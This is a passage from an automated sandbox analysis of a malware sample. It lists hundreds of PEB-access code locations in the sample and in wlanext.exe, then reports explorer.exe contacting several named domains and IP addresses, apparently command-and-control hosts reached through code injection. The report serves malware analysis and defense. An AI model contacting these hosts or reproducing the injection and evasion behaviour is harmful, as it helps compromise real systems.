          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AE070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A4A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A4A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A3F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AAFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AAFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A2FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AE8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A2EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038C138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038BD380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03811B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03811B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0383B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03832397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038D5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03834BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03834BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03834BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038853CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038853CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0382DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038C131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0380DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038D8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0380F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0380DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03833B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03833B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0383D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0383D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038052A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038052A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038052A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038052A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038052A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0381AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0381AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0383FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03832ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03832AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03818A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03805210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03805210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03805210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03805210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0380AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0380AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038CAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038CAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03823A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03844A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03844A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03809240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03809240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03809240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03809240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038CEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03894257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038BB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038BB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038D8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0384927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0382C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0383A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03832990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038361A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038361A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038869A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038851BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038851BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038851BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038851BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038941E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0380B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0380B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0380B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03809100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03809100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03809100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03824120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03824120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03824120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03824120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03824120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0383513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0383513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0382B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0382B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0380C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0380B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0380B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03809080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03883884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03883884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038490AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0383F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0383F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0383F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0389B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0389B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0389B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0389B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0389B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0389B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038058EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038D4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038D4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03887016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03887016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03887016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0381B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0381B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0381B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0381B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0383002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0383002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0383002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0383002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0383002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03820050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03820050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038D1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038C2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03818794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03887794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03887794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03887794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038437F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038D070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038D070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0383A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0383A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0382F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0389FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0389FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03804F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03804F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0383E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0381EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0381FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038D8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0389FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038D0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038D0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038D0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038846A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03848EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038BFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038336CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038D8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038316E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038176E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0380C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0380C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0380C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03838E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038C1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0383A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0383A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0380E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038BFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03817E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03817E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03817E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03817E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03817E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03817E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038CAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038CAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0381766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0382AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0382AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0382AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0382AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0382AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03832581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03832581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03832581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03832581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03802D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03802D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03802D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03802D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03802D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0383FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0383FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038D05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038D05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038335A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03831DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03831DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03831DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03886DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03886DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03886DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03886DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03886DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03886DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0381D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0381D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038CFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038CFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038CFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038CFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038B8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0380AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03813D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03813D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03813D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03813D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03813D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03813D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03813D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03813D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03813D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03813D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03813D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03813D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03813D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038CE539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03834D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03834D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03834D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038D8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0388A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03843D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03883540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03827D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0382C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0382C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0381849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\wlanext.exeProcess token adjusted: Debug

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.healshameyoga.com
          Source: C:\Windows\explorer.exeDomain query: www.ikeberto.com
          Source: C:\Windows\explorer.exeDomain query: www.mmgenius.com
          Source: C:\Windows\explorer.exeNetwork Connect: 198.54.114.164 80
          Source: C:\Windows\explorer.exeNetwork Connect: 154.93.81.33 80
          Source: C:\Windows\explorer.exeNetwork Connect: 3.16.197.4 80
          Source: C:\Windows\explorer.exeDomain query: www.directflence.com
          Source: C:\Windows\explorer.exeNetwork Connect: 23.227.38.74 80
          Source: C:\Windows\explorer.exeDomain query: www.booweats.com
